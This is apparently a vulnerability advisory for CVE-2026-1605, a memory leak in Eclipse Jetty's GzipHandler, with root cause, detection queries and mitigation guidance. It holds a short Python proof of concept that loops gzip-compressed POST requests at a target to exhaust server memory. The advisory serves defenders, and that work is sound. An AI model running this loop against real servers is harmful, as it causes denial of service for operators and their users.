CVE-2026-1605 – Eclipse Jetty Inflater Resource Leak
Vulnerability Summary
| Field | Details |
|---|---|
| CVE ID | CVE-2026-1605 |
| Product | Eclipse Jetty |
| Component | GzipHandler |
| Vulnerability Type | Resource Leak / Memory Exhaustion |
| CWE | CWE-400 (Uncontrolled Resource Consumption), CWE-401 (Missing Release of Memory After Effective Lifetime) |
| CVSS Score | 7.5 |
| Severity | High |
| CVSS Vector | AV:N / AC:L / PR:N / UI:N / S:U / C:N / I:N / A:H |
| Attack Vector | Network |
| Privileges Required | None |
| User Interaction | None |
| Impact | Denial of Service (Availability) |
| Exploitability | Remote |
| Exploit Availability | No publicly confirmed exploit at disclosure time |
| Affected Versions | Jetty 12.0.0 – 12.0.31, Jetty 12.1.0 – 12.1.5 |
| Published | March 2026 |
| Official Patch | https://github.com/jetty/jetty.project/security/advisories/GHSA-xxh7-fcf3-rj7f |
The vulnerability exists in the Jetty GzipHandler component responsible for processing compressed HTTP traffic. A flaw in how decompression resources are handled results in a memory resource leak. When specially crafted HTTP requests are repeatedly processed, system memory consumption gradually increases until the application becomes unstable or stops responding.
Vulnerability Overview
In affected Jetty versions, the request handling pipeline allocates a JDK Inflater object whenever a request arrives with gzip compression enabled.
The Inflater object is normally expected to be released after the request lifecycle is completed. However, the cleanup routine is tied to the logic used when a compressed response is generated. If a compressed request is received but the server returns a non-compressed response, the cleanup logic is never executed.
As a result, the Inflater instance remains allocated in memory.
When this condition occurs repeatedly, multiple Inflater instances accumulate in memory, which eventually causes excessive memory consumption. Over time the Java process may experience heavy garbage collection, degraded performance, or a complete service crash due to memory exhaustion.
Technical Details
The issue originates from the interaction between the GzipHandler request decompression workflow and the response compression lifecycle.
Typical request handling in Jetty:
- Client sends HTTP request with gzip encoding.
- Jetty allocates a JDK Inflater to decompress the request body.
- Request is forwarded to the application layer.
- Application generates a response.
- Resource cleanup is triggered when gzip response handling completes.
The flaw occurs when:
- Request is compressed
- Response is not compressed
In this scenario, the response compression logic is skipped, which also prevents the Inflater cleanup routine from running.
Because the object is never released, memory consumption gradually increases.
This behaviour may not immediately crash the system but leads to progressive resource exhaustion, which can ultimately disrupt service availability.
Root Cause
The root cause is the improper lifecycle management of the Inflater object.
The resource release is incorrectly bound to the response compression mechanism, rather than the request decompression lifecycle.
When the response bypasses compression, the Inflater remains allocated.
This results in:
- Memory allocation without release
- Increased heap pressure
- Resource exhaustion over time
Affected Environment
The vulnerability may affect environments where:
- Jetty is used as a standalone HTTP server
- Jetty runs as an embedded server inside applications
- Applications accept gzip encoded HTTP requests
- GzipHandler is enabled
Common affected deployments include:
- Java microservices
- Spring Boot applications configured with Jetty
- API gateways using Jetty
- Internal web platforms running Jetty containers
Internet-facing Jetty deployments are particularly exposed because attackers can trigger the vulnerable behaviour remotely.
Exploitation Scenario
The vulnerability may be exploited through repeated HTTP requests containing gzip compressed payloads.
An attacker could automate a script that continuously sends compressed requests while ensuring that the application returns an uncompressed response.
Each request causes an Inflater object to remain allocated in memory.
Because these objects accumulate, the application memory footprint continues to increase until the server becomes unstable.
Potential impacts include:
- High JVM heap utilization
- Increased garbage collection frequency
- Slow response times
- JVM OutOfMemoryError
- Application crash
- Service outage
This attack requires no authentication or special privileges.
Proof of Concept (Educational)
The following example demonstrates how repeated compressed requests could trigger the issue.
Example HTTP Request
POST /api/data HTTP/1.1
Host: target-server
Content-Encoding: gzip
Content-Type: application/json
Connection: keep-alive
Content-Length: 150<gzip compressed request body>
Example Python PoC
import gzip
import requestsurl = "http://target-server/api/data"payload = gzip.compress(b'{"test":"resource_leak"}')headers = {
"Content-Encoding": "gzip",
"Content-Type": "application/json"
}for i in range(100000):
try:
requests.post(url, data=payload, headers=headers)
except:
pass
When executed repeatedly against a vulnerable system, memory consumption gradually increases until service degradation occurs.
This code is provided only for educational security testing in controlled environments.
MITRE ATT&CK Mapping
| Tactic | Technique | ID |
|---|---|---|
| Impact | Endpoint Denial of Service | T1499 |
| Impact | Resource Exhaustion | T1499.002 |
| Impact | Application Layer DoS | T1499.004 |
The vulnerability aligns with availability-focused attacks, where service disruption is achieved by exhausting server resources.
Indicators of Compromise
During exploitation attempts, the following indicators may be observed:
Application Indicators
- Sudden increase in JVM heap memory usage
- Increased frequency of garbage collection cycles
- Application latency spikes
- Service crashes or restarts
Log Indicators
Repeated requests containing:
Content-Encoding: gzip
Possible JVM error messages:
java.lang.OutOfMemoryError: Java heap space
java.lang.OutOfMemoryError: GC overhead limit exceeded
Detection
Monitoring for abnormal gzip traffic patterns can help identify exploitation attempts.
Log Sources
Recommended telemetry sources include:
- Web server access logs
- Reverse proxy logs
- Application logs
- JVM garbage collection logs
- Container runtime logs
- WAF or API gateway logs
Detection Queries
Splunk
index=web_logs
| search request_headers="Content-Encoding: gzip"
| stats count by src_ip
| where count > 300
Elastic / Kibana
http.request.headers.content-encoding:"gzip"
Aggregation example:
GET /logs-*/_search
{
"query": {
"match": {
"http.request.headers.content-encoding": "gzip"
}
},
"aggs": {
"requests_per_ip": {
"terms": {
"field": "source.ip",
"size": 20
}
}
}
}
Microsoft Sentinel (KQL)
CommonSecurityLog
| where RequestHeaders contains "Content-Encoding: gzip"
| summarize count() by SourceIP, bin(TimeGenerated, 5m)
| where count_ > 200
Generic SIEM Detection Logic
IF
HTTP header contains "Content-Encoding: gzip"
AND
request volume from same source exceeds threshold
THEN
flag potential resource exhaustion attempt
Mitigation
Short-term mitigation steps may include:
- Rate limiting gzip encoded requests
- Blocking unnecessary gzip request bodies
- Filtering excessive compressed traffic through WAF
- Monitoring JVM memory consumption
Operational controls such as memory limits or container restarts may reduce impact but will not eliminate the underlying flaw.
The only reliable remediation is applying the vendor patch.
Remediation
Upgrade Jetty to a patched release where the Inflater resource lifecycle is properly handled.
Vendor security advisory and patch:
https://github.com/jetty/jetty.project/security/advisories/GHSA-xxh7-fcf3-rj7f
Security Impact
Although the vulnerability does not allow direct code execution or data exposure, it enables attackers to remotely trigger memory exhaustion conditions.
Because the attack requires minimal effort and no authentication, exposed Jetty servers may be forced into service disruption if not updated.
Organizations running affected Jetty versions should prioritize patching to avoid potential Denial-of-Service conditions in production environments.
